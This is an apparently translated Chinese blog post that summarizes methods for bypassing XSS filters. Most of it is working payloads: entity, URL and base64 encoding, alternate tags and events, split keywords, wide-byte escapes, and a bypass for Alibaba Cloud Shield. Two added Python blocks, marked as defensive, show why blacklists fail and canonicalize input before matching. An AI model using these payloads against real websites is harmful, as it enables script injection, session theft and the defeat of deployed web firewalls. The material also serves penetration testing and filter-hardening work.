XSS bypass experience summary

1. Overview


I have done a lot of penetration tests and found that systems use a wide variety of mechanisms to intercept XSS. Here I would like to share my experience of bypassing them.
When you first start learning XSS, the initial approach is usually to collect payloads into a dictionary and try them one by one, or feed them into Burp Suite for brute-forcing. This is direct and effective, but if the defense simply escapes special characters it works poorly, so what I share here is a step-by-step analysis process.
The steps of an XSS attack:
1. Observe whether the input data is echoed on the page
2. Determine the XSS defense mechanism
3. Construct the XSS payload
4. Trigger the XSS payload

2. Observe whether the input data is echoed on the page


My approach is to use Burp Suite directly: intercept the outgoing request and add a marker to the parameter, such as abcddcba, a value that does not occur on normal pages, then search for that marker in the response. For stored XSS the marker may not appear in the current response; in that case search for it in the rendered page with the browser developer tools (F12).
Based on where the input is echoed, I have met three situations so far:
1. Outside a tag
2. Inside an event handler attribute
3. Inside JavaScript code
Special case: if the system has a log or statistics function that stores information such as the visitor's IP address or the account or password the user entered, that function can also be used to carry out XSS. (The access IP can be replaced with an XSS payload via the X-Forwarded-For header.)

3. Judging the XSS defense mechanism


There are many ways to determine the XSS defense mechanism. I prefer to proceed step by step, so my order is:
1. Whether the filtering is done on the front end;
2. Whether it is blacklist filtering;


4. Construct XSS Payload


When a blacklist is used for filtering, you can analyze its rules step by step:
1. Special symbols such as <>"()`'
2. Tags
3. Events
4. Behavior (the functions that get called)


① Special symbols:


1. Parentheses () are filtered:
they can be replaced by backticks `` (a tagged template call)

<script>alert`1`</script>

The HTML entities &lpar; and &rpar; can be used instead (URL-encoded here as %26lpar;%26rpar;)

"/><math/href=javascript%26colon;alert%26lpar;1%26rpar;>1</math>



They can be replaced with hexadecimal character references

<img src=111 onerror=javascript:alert&#x28;1&#x29>



They can be replaced with decimal character references

<a href="javascript:alert&#40/1/&#41">a</a>



2. Both parentheses () and backticks `` are filtered:
the payload can be base64-encoded inside a data: URL

<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>



The pound sign # can be used (VBScript; this payload only triggers in IE10, and the pop-up shows something like a date, because #1/1# is a VBScript date literal)

<img language=vbs src=<b onerror=alert#1/1#>



Single quotes ' and colons : can be used (VBScript again; this payload only triggers below IE8)

<script language=vbs></script><img src=xx:x onerror="::alert+'1'::">



Square brackets [] can be used (VBScript, so IE only)

<![if<iframe/onload=vbs::alert[:]>



3. The colon : is filtered:
replace it with the entity &colon;

<a href=javascript&colon;alert(2)>1</a>



4. Angle brackets <> are filtered:
try URL-encoding, or double URL-encoding

%3cscript%3ealert(1)%3c%2Fscript%3e
%253cscript%253ealert(1)%253c%252Fscript%253e



Changing the case of the hex digits in %3c and %3e (%3C, %3E) sometimes works surprisingly well too

%3Cscript%3Ealert(1)%3C%2Fscript%3E



5. Spaces are filtered:
a slash / can separate the attributes instead

<img/src=1/onerror=alert(1)>



6. The equals sign = is filtered: a bare script tag needs no attributes, so no = at all

<script>alert(1)</script>



② Tags


There are a great many tags that can trigger XSS; some examples:
1. a tag (recommended when the number of characters is limited)

<a href="javascript:alert(1)">1</a>



2. script tag

<script>alert(1)</script>



3. button tag

<button onfocus=alert(1)>



4. iframe tag

<iframe onload=alert(1)>



5. img tag

<img src=1 onerror=alert(1)>



6. math tag

<math href="javascript:alert(1)">1</math>



7. command tag

<command oncut=alert(1)>1</command>



8. object tag

<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>



9. svg tag

<svg onload=alert(1)>



Of course there are many more tags that can trigger it, such as div, p, textarea, audio, var, video, etc.
10. Tag-name filtering can, of course, also be bypassed with mixed case

<ScRipt>alert(1)</ScRipt>



③Event


1. on* event handlers are filtered:
use the formaction attribute

<form><button formaction=javascript:alert(1)>1



Use the href attribute

<a href=javascript:alert(1)>



Use the data attribute

<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>



2. The length is limited:
oncut is recommended; it fires when the user cuts text

<a/oncut=alert(1)>1


3. Event-name filtering can also be bypassed with mixed case

④ Behavior
1. alert is filtered:
prompt can be used instead

<script>prompt(1)</script>



confirm can be used

<script>confirm(1)</script>



You can use document.write

<script>document.write(1)</script>



You can use window.open

<script>window.open(1)</script>



2. alert, prompt, confirm, document.write, window.open, etc. are all filtered:
replace them with decimal character references

<img src=1 onerror=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>



Hexadecimal references work the same way.
Base64 encoding can also be used

<a href="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">test</a>



Use JavaScript Unicode escapes (\u{...})

<script>\u{61}l\u{65}rt`1`</script>



Or splice the function name together from pieces

<script>this["ale"+"rt"]`666`</script>



or

<img src=0 onerror="var a='al';var b='ert';a+=b;top[a](1)">



Use Unicode escapes (\uXXXX, URL-encoded here)

<img src=0 onerror=%5Cu0061%5Cu006c%5Cu0065%5Cu0072%5Cu0074(22)>



Use HTML entities

<a href="javascript:alert&#40;&#49;&#41;">Hello</a>



3. javascript is filtered:
replace one of its characters with a decimal character reference (here the s)

<a href=java&#0000000000000000115cript:alert(2)>1</a>



Hexadecimal references work the same way

<a href=java&#x000000000000000073;cript:alert(2)>1</a>



4. Mixed case can also bypass this

<script>ALerT(1)</script>



Replacement applied when the input is echoed:
1. The keyword is replaced with an empty string.
Doubling the keyword bypasses this

<scrscriptipt>alert(1)</scrscriptipt>



When the inner script is removed, the scr before it and the ipt after it join back into script.
2. Quotes are escaped with a backslash \:
a wide byte can swallow the backslash

%df" onerror=alert(1) a=%df"1



The filter adds \ in front of the double quote; in a multibyte (wide-byte) charset, %df and the \ are parsed as one character, so the quote is left unescaped.
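Added example, not from the original post: Python showing why the two replacement filters above fail, a single-pass delete that lets scrscriptipt re-form script, and backslash-escaping of quotes that a lead byte swallows under a multibyte charset, beside the fixed-point strip and html.escape output encoding that hold. The GBK charset and the sample inputs are assumptions for the demo.

```python
import html

def strip_once(s: str, word: str = "script") -> str:
    """The page's weak filter: delete every occurrence of the word in one pass."""
    return s.replace(word, "")

def strip_until_stable(s: str, word: str = "script") -> str:
    """Repeat the deletion until nothing changes, so the halves left behind by
    one pass (scr + ipt) cannot re-form the word. Still a blacklist, so only a
    stopgap; html.escape below is the actual mitigation."""
    while True:
        stripped = s.replace(word, "")
        if stripped == s:
            return s
        s = stripped

def backslash_escape(raw: bytes) -> bytes:
    """The page's second weak filter: a backslash before every double quote."""
    return raw.replace(b'"', b'\\"')

def quote_survives_wide_byte(raw: bytes, charset: str = "gbk") -> bool:
    """True when decoding the escaped bytes in a multibyte charset swallows the
    backslash (0x5c) into the preceding lead byte and leaves the quote bare."""
    text = backslash_escape(raw).decode(charset, errors="replace")
    return '"' in text and '\\"' not in text

def safe_attribute_value(raw: bytes, charset: str = "gbk") -> str:
    """Output encoding instead of filtering: &quot; starts with an ampersand
    (0x26), below the trail-byte range, so no lead byte can absorb it and the
    parser never sees a raw quote."""
    return html.escape(raw.decode(charset, errors="replace"), quote=True)

# Constructed sample inputs mirroring the two payloads above.
DOUBLED = "<scrscriptipt>alert(1)</scrscriptipt>"
WIDE_BYTE = b'\xdf" onerror=alert(1) a=\xdf"1'   # the %df" ... a=%df"1 payload
PLAIN = b'" onerror=alert(1)'                     # ASCII only, escaping holds

if __name__ == "__main__":
    print(strip_once(DOUBLED), "->", strip_until_stable(DOUBLED))
    print("quote survives (wide byte):", quote_survives_wide_byte(WIDE_BYTE))
    print("quote survives (plain):", quote_survives_wide_byte(PLAIN))
    print(safe_attribute_value(WIDE_BYTE))
```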

Some real situations I have encountered:
1. The system neutralizes event handlers such as onclick by inserting an underscore after on (on_click); data, expression, javascript, vbscript, etc. are all filtered as well.

<img src=1 on/onerror=alert(1)>



2. The filter rule was javascript:|alert|confirm|window|document|prompt|1 (including encoded forms)|(1) (including encoded forms)

<math/href=javascripT%26NewLine;:/1/[Symbol.replace]('1',alert)>1</math>



3. The input is echoed inside a tag whose type attribute is hidden, and angle brackets <> and parentheses () are filtered:
accesskey can be used

%22%20accesskey=%22x%22%20onclick=alert%601%60%20a=%221



In Firefox it is triggered with Shift+Alt+x;
I have not succeeded in other browsers yet.

4. Bypassing Alibaba Cloud Shield (stored XSS)

\"><object data=data:text/html;base64,PG9iamVjdCBkYXRhPWRhdGE6dGV4dC9odG1sO2Jhc2U2NCxQSE5qY21sd2RENWhiR1Z5ZENnaWFHRmphMlZ5SWlrOEwzTmpjbWx3ZEQ0PT4=>



5. on* event handlers are blocked and base64 encoding is restricted: a data: URL with a charset and entity-encoded tags

<object data=data:text/html;charset=utf-8,&lt;script&gt;alert(1)&lt;%2fscript&gt;></object>
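Added example, not from the original post: a Python canonicalizer that peels off the encoding layers listed in ① and ④ and in situation 2 above (URL-encoding, HTML character references, JS escapes, tab/newline, letter case) before keyword matching, so a defender can see exactly which keywords a raw substring blacklist misses; it also shows why such blacklists are only a backstop behind proper output encoding. BLACKLIST and the sample names are constructed for the demo; the payloads are copied from this page.

```python
import html
import re
from urllib.parse import unquote

# Keywords a typical substring blacklist looks for (constructed for this demo).
BLACKLIST = ("<script", "javascript:", "alert", "(", ")")

# Copies of payloads shown on this page, used as sample input.
SAMPLES = {
    "entities_via_url": '"/><math/href=javascript%26colon;alert%26lpar;1%26rpar;>1</math>',
    "decimal_refs": "<img src=1 onerror=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;"
                    "&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>",
    "leading_zeros": "<a href=java&#0000000000000000115cript:alert(2)>1</a>",
    "newline_entity": "<math/href=javascripT%26NewLine;:/1/[Symbol.replace]('1',alert)>1</math>",
    "double_urlencode": "%253cscript%253ealert(1)%253c%252Fscript%253e",
    "js_escapes": r"<script>\u{61}l\u{65}rt`1`</script>",
}

def canonicalize(s: str, rounds: int = 3) -> str:
    """Peel off the layers the page lists before matching: URL-encoding (one or
    two layers), HTML character references (decimal, hex, leading zeros, missing
    semicolon, named ones such as &lpar; &colon; &NewLine;), JS \\uXXXX and
    \\u{XX} escapes, tab/newline/CR (dropped by URL parsing) and letter case."""
    for _ in range(rounds):
        before = s
        s = unquote(s)                       # %26lpar; -> &lpar;, %3c -> <
        s = html.unescape(s)                 # &lpar; &#40; &#x28; -> (
        s = re.sub(r"\\u\{([0-9a-fA-F]+)\}|\\u([0-9a-fA-F]{4})",
                   lambda m: chr(int(m.group(1) or m.group(2), 16)), s)
        s = re.sub(r"[\t\n\r]", "", s)      # javascripT<newline>: -> javascripT:
        if s == before:                      # fixed point: nothing left to decode
            break
    return s.lower()

def keyword_hits(s: str) -> set:
    """What a naive case-insensitive substring blacklist sees in the raw input."""
    low = s.lower()
    return {k for k in BLACKLIST if k in low}

def canonical_hits(s: str) -> set:
    """The same blacklist applied after canonicalization."""
    return keyword_hits(canonicalize(s))

def missed_by_naive(s: str) -> set:
    """Keywords the raw match fails to see but canonicalization exposes."""
    return canonical_hits(s) - keyword_hits(s)

if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(f"{name:17} missed by raw match: {sorted(missed_by_naive(payload))}")
```

Every sample leaves at least one keyword invisible to the raw match, which is the practical argument for canonicalizing (or, better, context-aware output encoding) rather than growing the blacklist.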



5. Finally


Bypasses can be combined, which is the most interesting part. This article is probably not complete; if I come across new interesting bypass methods I will keep updating it. Thank you!

Origin blog.csdn.net/weixin_46622976/article/details/127420736